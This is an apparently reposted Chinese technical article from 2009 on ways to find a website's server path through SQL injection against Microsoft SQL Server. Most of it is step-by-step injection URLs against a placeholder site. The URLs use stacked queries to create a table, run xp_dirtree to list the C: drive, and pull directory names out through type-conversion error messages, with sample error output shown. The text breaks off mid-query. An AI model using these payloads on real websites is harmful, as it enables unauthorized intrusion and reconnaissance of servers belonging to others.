软件测试开发技术SQL Server取得网站路径的几种方法及比较

发表于:2009-10-20来源:作者:点击数: 标签:软件测试SqlsqlSQLSERVER
软件测试 开发 技术SQL Server取得网站路径的几种方法及比较 SQL Server 数据库 关键字:SQL Server 网站路径 【赛迪网-IT技术报道】如果网站只开了80端口,你会发现下面的方法是比较有用的,其中用的方法几乎都不是我发现的,文总包括一些注入时的个人经验

软件测试开发技术SQL Server取得网站路径的几种方法及比较  SQL Server数据库

关键字:SQL Server 网站路径  

【赛迪网-IT技术报道】如果网站只开了80端口,你会发现下面的方法是比较有用的,其中用的方法几乎都不是我发现的,文总包括一些注入时的个人经验和技巧方法可以说有4种(现在已知的)

第一种方法:

这个是<<怪异的SQL注入>>中介绍的方法

利用sqlserver的xp_dirtree,好的我们先来将一下方法,然后再说其优劣处(在原文的基础上作了点补充)

建立表

语句:http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000))--

返回:正常的信息!说明建表成功!继续!

(建的比原文的大一点,因为我遇过名子很长的文件,删除了那个id,因为没有什么用

语句:http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ’c:\’ --

返回:正常信息。说明写入C盘的所有目录成功了!爽!接下来就是取表了!暴它出来。(好像只有暴这种方法了)

语句:http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-

返回:Microsoft OLE DB Provider for SQL Server 错误 80040e07

将 varchar 值 ’@Inetpub’转换为数据类型为 int 的列时发生语法错误。

再依次爆出表中的目录名称!

语句:http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from

dirs where paths not in( ’@Inetpub’))--

返回:Microsoft OLE DB Provider for SQL Server 错误 80040e07

将 varchar 值 ’test’转换为数据类型为 int 的列时发生语法错误。

再依次爆出表中的目录名称!

好我们继续

语句:http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from

原文转自:http://www.ltesting.net